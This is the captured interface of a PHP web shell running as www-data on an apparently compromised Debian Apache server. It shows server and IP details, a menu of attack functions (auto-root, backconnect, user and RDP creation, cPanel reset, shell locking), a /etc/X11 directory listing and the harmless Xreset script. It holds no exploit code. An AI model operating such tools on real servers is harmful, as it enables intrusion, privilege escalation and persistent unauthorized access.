Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.220.134.161
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
X11 /
[ HOME SHELL ]
Name
Size
Permission
Action
Xreset.d
[ DIR ]
drwxr-xr-x
Xresources
[ DIR ]
drwxr-xr-x
Xsession.d
[ DIR ]
drwxr-xr-x
app-defaults
[ DIR ]
drwxr-xr-x
xkb
[ DIR ]
drwxr-xr-x
Xreset
709
B
-rwxr-xr-x
Xsession
3.43
KB
-rwxr-xr-x
Xsession.options
265
B
-rw-r--r--
Xwrapper.config
601
B
-rw-r--r--
rgb.txt
16.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Xreset
#!/bin/sh # # /etc/X11/Xreset # # global Xreset file -- for use by display managers # $Id: Xsession 967 2005-12-27 07:20:55Z dnusinow $ set -e PROGNAME=Xreset SYSSESSIONDIR=/etc/X11/Xreset.d if [ ! -d "$SYSSESSIONDIR" ]; then # Nothing to do, exiting exit 0 fi # use run-parts to source every file in the session directory; we source # instead of executing so that the variables and functions defined above # are available to the scripts, and so that they can pass variables to each # other SESSIONFILES=$(run-parts --list $SYSSESSIONDIR) if [ -n "$SESSIONFILES" ]; then set +e for SESSIONFILE in $SESSIONFILES; do . $SESSIONFILE done set -e fi exit 0 # vim:set ai et sts=2 sw=2 tw=80:
Close